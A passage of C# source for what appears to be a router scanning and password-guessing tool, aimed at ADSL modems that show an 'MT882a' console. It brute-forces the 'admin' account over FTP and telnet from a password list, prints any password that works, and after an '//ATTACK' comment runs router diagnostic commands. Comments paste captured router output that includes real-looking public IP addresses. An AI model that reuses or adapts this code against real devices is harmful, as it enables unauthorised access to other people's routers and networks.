--------------- NDIS CONFIGURATION BLOCK ----------------
type=1 flags=0001
Board/Chassis:1 Lines/Board:1 Channels/Lines:2 Total Channel:2
task-id=8041f1f4 event-q=80458c2c(19) data-q=80458c70(1a) func-id=2
board-cfg=8042c8a4 line-cfg=8042c8bc chann-cfg=8042c8d0
board-pp (8042c8f0)
804273fc
line-pp (8042c8f4)
8042956c
chann-pp (8042c8f8)
804bf8a4 804bfe34
--------------- BOARD DISPLAY ---------------------------
ID slot# n-line n-chann status line-cfg chann-cfg
00 0 1 2 0001 8042c8bc 8042c8d0
--------------- LINE DISPLAY ---------------------------
ID line# board-id n-chann chann-cfg
00 1 00 2 8042c8d0
--------------- CHANNEL DISPLAY -------------------------
ID chan# line-id board-id address name
00 1 00 00 804bf8a4 enet0
01 2 00 00 804bfe34 enet1
*/
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ether config" + "\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ip tcp status" + "\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
/*
MT882a> ip tcp status
( 1)tcpRtoAlgorithm 4 ( 2)tcpRtoMin 0
( 3)tcpRtoMax 4294967295 ( 4)tcpMaxConn 16
( 5)tcpActiveOpens 0 ( 6)tcpPassiveOpens 477
( 7)tcpAttemptFails 42 ( 8)tcpEstabResets 22
( 9)tcpCurrEstab 1 (10)tcpInSegs 9765
(11)tcpOutSegs 2549 (12)tcpRetransSegs 389
(14)tcpInErrs 2 (15)tcpOutRsts 93
tcbsInUseCnt = 4
&TCB Rcv-Q Snd-Q Local socket Remote socket State
804fdce4 0 621 41.248.40.35:23 196.12.232.120:61565 Estab 0
804fd66c 0 0 0.0.0.0:21 0.0.0.0:0 Listen 0
804fd558 0 0 0.0.0.0:7547 0.0.0.0:0 Listen (S) 0
804fd444 0 0 0.0.0.0:80 0.0.0.0:0 Listen (S) 0
*/
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ip udp status" + "\r"), SocketFlags.None);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> " + stringdata, myip);
//ATTACK
/*
MT882a> ip ping
Usage: ping <hostid>
MT882a> ip ping www.google.com
Resolving www.google.com... 173.194.67.105
sent rcvd rate rtt avg mdev max min
1 1 100 80 80 0 80 80
2 2 100 80 80 0 80 80
3 3 100 80 80 0 80 80
*/
/*
MT882a> ip route
status add addiface addprivate
addrom drop
MT882a> ip route status
Dest FF Len Device Gateway Metric stat Timer Use RN
41.248.40.1 00 32 poe0 41.248.40.1 1 0329 0 0 ISP-0
192.168.1.0 00 24 enet0 192.168.1.1 1 041b 0 0
default 00 0 poe0 ISP-0 2 00ab 0 3245 ISP-0
*/
/*
MT882a> ether driver
cnt status config ackdrop
macnum ackmode etherppp wan2lan
MT882a> ether driver cnt
disp
MT882a> ether driver cnt disp
Usage: disp <name>
MT882a> ether driver status
Usage: driver status <ch-name>
MT882a> ether driver config
Usage: driver config [0|1=auto|normal] [0|1=10|100] [0|1=HD|FD] <ch-name>
MT882a> ether driver ackdrop
current ack drop number is 0
ack drop cnt=0
Usage: ackdrop <number>
MT882a> ether driver macnum
Please input allowed mac number(0~255), 0 means no limitation
Current allowed mac number: 0
MT882a> ether driver ackmode
TCP ACK mode: off
ACK length: 90
TCP ACK mode type: Task
MT882a> ether driver etherppp
PPP check : on
MT882a> ether driver wan2lan
Usage: wan2lan [on||off] <number>
Current wan2lan feature status: off
*/
/*
MT882a> wan
atm node hwsar adsl
tsarm
MT882a> wan atm
test mpoasendloop oam vcpool
MT882a> wan atm test
Usage: test [fix|rand|period|oam|loopback]
MT882a> wan node
index display clear save
ispname enable disable encap
mux vpi vci qos
pcr scr mbs cdvt
wanip remoteip bridge routeip
nat rip multicast callsch
service nailedup filter ppp
mtu default_r
MT882a> wan node display
WAN node index = 1
Active = no
Route IP = off
Bridge = off
Name =
Encapsulcation <2:PPPoE|3:RFC1483|4:PPPoA|5:Enet Encap> = 0
Mux <1:LLC|2:VC> = 0
VPI/VCI = 0 / 0
PPPoE service name =
PPP username =
PPP password =
PPP authentication <1:PAP|2:CHAP|3:BOTH> = 0
SUA/NAT is disabled
Static IP address
WAN IP address = 0.0.0.0
Remote IP address = 0.0.0.0
Remote IP subnet mask = 0.0.0.0
Idle timeout = 0
Call scheduling set = 1 1 1 1
Nailed-up connection = off
QOS Type <2:CBR|3:UBR|4:rtVBR|5:nrtVBR|6:GFR> = 0
QOS PCR/SCR/MBS/CDVT = 0, 0, 0, 0
RIP direction <0:none|1:both|2:in|3:out>= 0
RIP version <0:RIP-1|1:RIP-2B|2:RIP-2M> = 0
Multicast <0:IGMP-v2|1:IGMP-v1|2:none> = 0
Incoming protocol filter set = 1 1 1 1
Incoming device filter set = 1 1 1 1
Outgoing protocol filter set = 1 1 1 1
Outgoing device filter set = 1 1 1 1
MT882a> wan node wanip
Usage: wan node wanip <static> <ip address>
or: wan node wanip <dynamic>
errcode = -4
*/
/*
MT882a> wan adsl
chandata close coding defbitmap
linedata open opencmd opmode
perfdata reset status version
vendorid utopia nearituid farituid
cellcnt display rateadap dumpcondition
sampletime noisegt noisemargin persisttime
timeinterval defectcheck txgain targetnoise
txfilter setrvid txtones snroffset
errorsecond diag watchdog fwversion
uptime dumprate annex
MT882a> wan adsl display
shutdown rateup
MT882a> wan adsl fwversion
DMT FwVer: 3.11.2.151_A_TC3086 HwVer: T14F7_5.0
MT882a> wan adsl utopia
UTOPIA parameters:
level: 1
fast address: 0
interleaved address: 1
MT882a> wan adsl coding
line coding: DMT
MT882a> wan adsl txtones
usage: <start tone> <end tone> tone=0x6~0x1F
current value: start_tone=6 end_tone=1f
MT882a> wan adsl opmode
operational mode: ITU G.992.5(ADSL2PLUS)
MT882a> wan adsl uptime
ADSL uptime 122:15:16
MT882a> wan adsl sampletime
Usage: min
MT882a> wan adsl linedata
far near
MT882a> wan adsl linedata near
relative capacity occupation: 100%
noise margin downstream: 37.0 db
output power upstream: 11.3 dbm
attenuation downstream: 13.7 db
MT882a> wan adsl linedata far
relative capacity occupation: 100%
noise margin upstream: 34.5 db
output power downstream: 19.3 dbm
attenuation upstream: 9.6 db
carrier load: number of bits per symbol(tone)
tone 0- 31: 00 00 00 00 02 25 56 66 66 66 66 66 55 44 43 20
tone 32- 63: 00 00 00 00 00 00 00 00 00 00 04 34 45 55 54 55
tone 64- 95: 10 44 53 65 53 05 05 56 66 65 53 65 36 65 66 54
tone 96-127: 55 65 55 45 55 54 45 45 14 55 41 55 45 55 45 51
tone 128-159: 54 45 54 55 44 55 55 55 55 45 65 45 45 46 54 56
tone 160-191: 54 55 45 50 04 00 45 05 05 44 54 54 55 35 40 54
tone 192-223: 55 55 50 45 05 00 55 00 40 00 00 00 00 00 00 00
tone 224-255: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
tone 256-287: 00 00 50 00 00 00 50 00 00 40 00 40 00 00 00 00
tone 288-319: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
tone 320-351: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
tone 352-383: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
tone 384-415: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
tone 416-447: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
tone 448-479: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
tone 480-511: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
MT882a> dot1q disp
802.1Q Tagged-based VLAN: Inactive(1)
Port | PVID || Port | PVID || Port | PVID || Port | PVID ||
------+--------++------+--------++------+--------++------+--------++
e1 | 1 ||
p0 | 1 || p1 | 1 || p2 | 1 || p3 | 1 ||
p4 | 1 || p5 | 1 || p6 | 1 || p7 | 1 ||
u | 1 ||
cpu | 15 ||
No|Act| VID| Name | Egress Port
--+---+----+-----------+------------------------------------------
| Tagged Egress Port
+------------------------------------------
0| N | 0| |
|
1| N | 0| |
|
2| N | 0| |
|
3| N | 0| |
|
4| N | 0| |
|
5| N | 0| |
|
6| N | 0| |
|
7| N | 0| |
|
8| N | 0| |
|
9| N | 0| |
|
10| N | 0| |
|
11| N | 0| |
|
12| N | 0| |
|
13| N | 0| |
|
14| Y | 1| vlan14|e1,u,p0,p1,p2,p3,p4,p5,p6,p7
|
15| Y | 15| vlan15|e1,u
|
*/
Sock_scan.Close();
break;
}
}
catch (Exception e)
{
Console.WriteLine("DEBUG EXCEPTION02: {0} -> " + e.Message, myip);
}
}
}
else
{
Console.WriteLine("{0} DEBUG no telnet Password: "+banner,myip);
}
// Sock_scan.Close();
}
public static void ftptry(string myip)
{
Console.WriteLine("ftptry");
byte[] data = new byte[1024];
string stringdata;
int recv;
IPAddress adresseIP = IPAddress.Parse(myip);
IPEndPoint ip = new IPEndPoint(adresseIP, 21);
Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
Sock_scan.Connect(ip);
recv = Sock_scan.Receive(data);
Console.WriteLine("Banner ftp: " + Encoding.ASCII.GetString(data, 0, recv));
foreach (string password in passwords)
{
try
{
Console.WriteLine("{0} -> USER", myip);
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("USER" + Convert.ToChar(32) + "admin" + Convert.ToChar(13) + Convert.ToChar(10)));
recv = Sock_scan.Receive(data);
Console.WriteLine("{0} -> Response ftp: " + Encoding.ASCII.GetString(data, 0, recv), myip);
//331 Please specify the password.
//331 Enter PASS command
//331 User name okay, need password.
Console.WriteLine("{0} -> PASS", myip);
Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("PASS" + Convert.ToChar(32) + password + Convert.ToChar(13) + Convert.ToChar(10)));
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> Response ftp: " + stringdata, myip);
//530 Login incorrect.
//530 Not logged in.
//530 User admin cannot log in.
if (stringdata.Contains("530"))
{
Console.Write("{0} -> bad ftp password: {1}\n", myip, password);
}
//230 User logged in, proceed.
if (stringdata.Contains("230"))
{
Console.Write("{0} -> FTP PASSWORD IS: {1}\n", myip, password);
break;
}
}
catch (Exception e)
{
Console.WriteLine("{0} -> " + e.Message, myip);
}
}
Sock_scan.Close();
/*
FtpWebRequest reqFTP;
reqFTP = (FtpWebRequest)FtpWebRequest.Create(new Uri("ftp://" + myip+"/"));
reqFTP.Credentials = new NetworkCredential("login", "pass");
reqFTP.KeepAlive = false;
reqFTP.Method = WebRequestMethods.Ftp.ListDirectory;
// On recupere la response du serveur FTP
FtpWebResponse response = (FtpWebResponse)reqFTP.GetResponse();
Console.WriteLine("{0} -> Réponse FTP:" + response, myip);
/*
// On récupere le flux de la réponse
StreamReader monStreamReader = new StreamReader(response.GetResponseStream(), Encoding.Default);
//On enregistre la liste dans un chaine
string listeBrute = monStreamReader.ReadToEnd();
//On recupere l'ensemble des fichiers de la chaine
string[] liste = listeBrute.Split(Environment.NewLine.ToCharArray()[0]);
//On retourne la liste des répertoires
//return liste;
*/
}
/*
public static void ConnectCallback(IAsyncResult ar)
{
try
{
// Get The connection socket from the callback
Socket sock1 = (Socket)ar.AsyncState;
sock1.Blocking = false; // This is a non blocking IO
if (sock1.Connected)
{
// Define a new Callback to read the data
AsyncCallback recieveData = new AsyncCallback(OnRecievedData);
// Begin reading data asyncronously
sock1.BeginReceive(m_byBuff, 0, m_byBuff.Length, SocketFlags.None, recieveData, sock1);
}
}
catch (Exception ex)
{
Console.WriteLine(ex.Message, "Setup Recieve callbackProc failed!");
}
}
*/
private static void ConnectCallback(IAsyncResult ar)
{
try
{
// Retrieve the socket from the state object.
Socket client = (Socket)ar.AsyncState;
// Complete the connection.
client.EndConnect(ar);
Console.WriteLine("Socket connected to {0}",
client.RemoteEndPoint.ToString());
// Signal that the connection has been made.
connectDone.Set();
Console.WriteLine("DEBUG ConnectCallback");
//cpt_th.Decrementer();
}
catch (Exception e)
{
Console.WriteLine("ERROR ConnectCallback: "+e.ToString());
}
}
private static void Receive(Socket client)
{
try
{
// Create the state object.
StateObject state = new StateObject();
state.workSocket = client;
// Begin receiving the data from the remote device.
client.BeginReceive(state.buffer, 0, StateObject.BufferSize, 0,
new AsyncCallback(ReceiveCallback), state);
}
catch (Exception e)
{
Console.WriteLine(e.ToString());
}
}
private static void ReceiveCallback(IAsyncResult ar)
{
try
{
// Retrieve the state object and the client socket
// from the asynchronous state object.
StateObject state = (StateObject)ar.AsyncState;
Socket client = state.workSocket;
// Read data from the remote device.
int bytesRead = client.EndReceive(ar);
if (bytesRead > 0)
{
// There might be more data, so store the data received so far.
state.sb.Append(Encoding.ASCII.GetString(state.buffer, 0, bytesRead));
// Get the rest of the data.
client.BeginReceive(state.buffer, 0, StateObject.BufferSize, 0,
new AsyncCallback(ReceiveCallback), state);
}
else
{
// All the data has arrived; put it in response.
if (state.sb.Length > 1)
{
response = state.sb.ToString();
}
// Signal that all bytes have been received.
receiveDone.Set();
}
}
catch (Exception e)
{
Console.WriteLine(e.ToString());
}
}
// State object for receiving data from remote device.
public class StateObject
{
// Client socket.
public Socket workSocket = null;
// Size of receive buffer.
public const int BufferSize = 256;
// Receive buffer.
public byte[] buffer = new byte[BufferSize];
// Received data string.
public StringBuilder sb = new StringBuilder();
}
private static string ProcessOptions(byte[] m_strLineToProcess)
{
string m_DISPLAYTEXT = "";
string m_strTemp = "";
string m_strOption = "";
string m_strNormalText = "";
bool bScanDone = false;
int ndx = 0;
int ldx = 0;
char ch;
try
{
for (int i = 0; i < m_strLineToProcess.Length; i++)
{
Char ss = Convert.ToChar(m_strLineToProcess[i]);
m_strTemp = m_strTemp + Convert.ToString(ss);
}
while (bScanDone != true)
{
int lensmk = m_strTemp.Length;
ndx = m_strTemp.IndexOf(Convert.ToString(IAC));
if (ndx > lensmk)
ndx = m_strTemp.Length;
if (ndx != -1)
{
m_DISPLAYTEXT += m_strTemp.Substring(0, ndx);
ch = m_strTemp[ndx + 1];
if (ch == DO || ch == DONT || ch == WILL || ch == WONT)
{
m_strOption = m_strTemp.Substring(ndx, 3);
string txt = m_strTemp.Substring(ndx + 3);
m_DISPLAYTEXT += m_strTemp.Substring(0, ndx);
m_ListOptions.Add(m_strOption);
m_strTemp = txt;
}
else
if (ch == IAC)
{
m_DISPLAYTEXT = m_strTemp.Substring(0, ndx);
m_strTemp = m_strTemp.Substring(ndx + 1);
}
else
if (ch == SB)
{
m_DISPLAYTEXT = m_strTemp.Substring(0, ndx);
ldx = m_strTemp.IndexOf(Convert.ToString(SE));
m_strOption = m_strTemp.Substring(ndx, ldx);
m_ListOptions.Add(m_strOption);
m_strTemp = m_strTemp.Substring(ldx);
}
}
else
{
m_DISPLAYTEXT = m_DISPLAYTEXT + m_strTemp;
bScanDone = true;
}
}
m_strNormalText = m_DISPLAYTEXT;
}
catch (Exception eP)
{
Console.WriteLine(eP.Message, "Application Error!!!");
//Application.Exit();
}
return m_strNormalText;
}
public static void OnRecievedData(IAsyncResult ar)
{
// Get The connection socket from the callback
Socket sock = (Socket)ar.AsyncState;
sock.Blocking = false; // This is a non blocking IO
// Get The data , if any
int nBytesRec = sock.EndReceive(ar);
if (nBytesRec > 0)
{
string sRecieved = Encoding.ASCII.GetString(m_byBuff, 0, nBytesRec);
string m_strLine = "";
string myline = null;
for (int i = 0; i < nBytesRec; i++)
{
Char ch = Convert.ToChar(m_byBuff[i]);
switch (ch)
{
case '\r':
m_strLine += Convert.ToString("\r\n");
break;
case '\n':
break;
default:
m_strLine += Convert.ToString(ch);
break;
}
}
try
{
int strLinelen = m_strLine.Length;
if (strLinelen == 0)
{
m_strLine = Convert.ToString("\r\n");
}
Byte[] mToProcess = new Byte[strLinelen];
for (int i = 0; i < strLinelen; i++)
mToProcess[i] = Convert.ToByte(m_strLine[i]);
// Process the incoming data
string mOutText = ProcessOptions(mToProcess);
//if (mOutText != "")
// textBox1.AppendText(mOutText);
myline+=mOutText;
//Console.WriteLine("Received data: {0}", mOutText);
// Respond to any incoming commands
//RespondToOptions();
}
catch (Exception ex)
{
//Object x = this;
Console.WriteLine(ex.Message, "Information!");
}
Console.WriteLine("Received data: {0}", myline);
if (myline.Contains("Password:"))
{
foreach (string password in passwords)
{
Thread.Sleep(100);
try
{
//Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + Convert.ToChar(13) + Convert.ToChar(10)));
sock.Send(System.Text.Encoding.ASCII.GetBytes(password));
//Thread.Sleep(100);
byte[] data = new byte[1024];
//string banner;
int recv;
recv = sock.Receive(data);
string stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> Response telnet: " + stringdata);
///*
//strRetPage = null;
//bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
//strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
//while (bytes > 0)
//{
// bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
// strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
//}
//Console.WriteLine("Response telnet: " + strRetPage);
//*
//Bad Password!!!
if (stringdata.Contains("*") || stringdata.Contains("Password:") || stringdata.Contains("Bad Password"))
{
Console.Write("{0} -> bad telnet password: {1}\n", password);
}
}
catch (Exception e)
{
Console.WriteLine("{0} -> " + e.Message);
}
}
}
}
else
{
// If no data was recieved then the connection is probably dead
Console.WriteLine("Disconnected", sock.RemoteEndPoint);
sock.Shutdown(SocketShutdown.Both);
sock.Close();
}
}
public string LocalIPAddress()
{
IPHostEntry host;
string localIP = "";
host = Dns.GetHostEntry(Dns.GetHostName());
foreach (IPAddress ip in host.AddressList)
{
if (ip.AddressFamily.ToString() == "InterNetwork")
{
localIP = ip.ToString();
}
}
return localIP;
}
public static IPAddress GetExternalIp()
{
string whatIsMyIp = "http://www.whatismyip.com/automation/n09230945.asp";
WebClient wc = new WebClient();
UTF8Encoding utf8 = new UTF8Encoding();
string requestHtml = "";
try
{
requestHtml = utf8.GetString(wc.DownloadData(whatIsMyIp));
}
catch (WebException we)
{
// do something with exception
Console.Write(we.ToString());
}
IPAddress externalIp = IPAddress.Parse(requestHtml);
return externalIp;
}
public static IPAddress GetExternalIp2()
{
WebClient client = new WebClient();
// Add a user agent header in case the requested URI contains a query.
client.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)");
string baseurl = "http://checkip.dyndns.org/";
Stream data = client.OpenRead(baseurl);
StreamReader reader = new StreamReader(data);
string s = reader.ReadToEnd();
data.Close();
reader.Close();
s = s.Replace("<html><head><title>Current IP Check</title></head><body>Current IP Address: ", "").Replace("</body></html>", "").ToString();
IPAddress externalIp = IPAddress.Parse(s);
return externalIp;
}
private void Lancer_Thread(object emetteur)
{
//Console.WriteLine("Evenement - Lancer_Thread");
lock (this)
{
// Console.WriteLine("DEBUG PULSE");
Monitor.Pulse(this);
}
}
public class Compteur_thread
{
public enum Operation
{
Incrementer = 1,
Decrementer = 2,
Nb_thread = 3,
Libre = 4,
}
Operation operation = Operation.Incrementer;
int compteur = 0;
public delegate void Lancer_Thread(object emetteur);
public event Lancer_Thread lancer_thread;
public void Incrementer()
{
lock (this)
{
// Console.WriteLine("DEBUG INCREMENTER");
if ((operation == Operation.Decrementer) || (operation == Operation.Nb_thread))
{
try
{
//Console.WriteLine("Incrementer - Monitor.Wait()");
Monitor.Wait(this);
}
catch (SynchronizationLockException e)
{
Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
catch (ThreadInterruptedException e)
{
Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
}
//Console.WriteLine("Incrementer");
operation = Operation.Incrementer;
compteur++;
Monitor.Pulse(this);
operation = Operation.Libre;
}
}
public void Decrementer()
{
lock (this)
{
// Console.WriteLine("DEBUG DECREMENTER");
if ((operation == Operation.Incrementer) || (operation == Operation.Nb_thread))
{
try
{
//Console.WriteLine("decrementer - Monitor.Wait()");
Monitor.Wait(this);
}
catch (SynchronizationLockException e)
{
Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
catch (ThreadInterruptedException e)
{
Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
}
//Console.WriteLine("decrementer");
operation = Operation.Decrementer;
compteur--;
if (lancer_thread != null)
lancer_thread(this);
Monitor.Pulse(this);
operation = Operation.Libre;
}
}
public void Nb_thread(out int nb)
{
lock (this)
{
// Console.WriteLine("DEBUG NB_THREAD");
if ((operation == Operation.Incrementer) || (operation == Operation.Decrementer))
{
try
{
//Console.WriteLine("Nb_thread - Monitor.Wait()");
Monitor.Wait(this);
}
catch (SynchronizationLockException e)
{
Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
catch (ThreadInterruptedException e)
{
Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
}
//Console.WriteLine("Nb_Thread classe");
operation = Operation.Nb_thread;
nb = compteur;
Monitor.Pulse(this);
operation = Operation.Libre;
}
}
}
}
}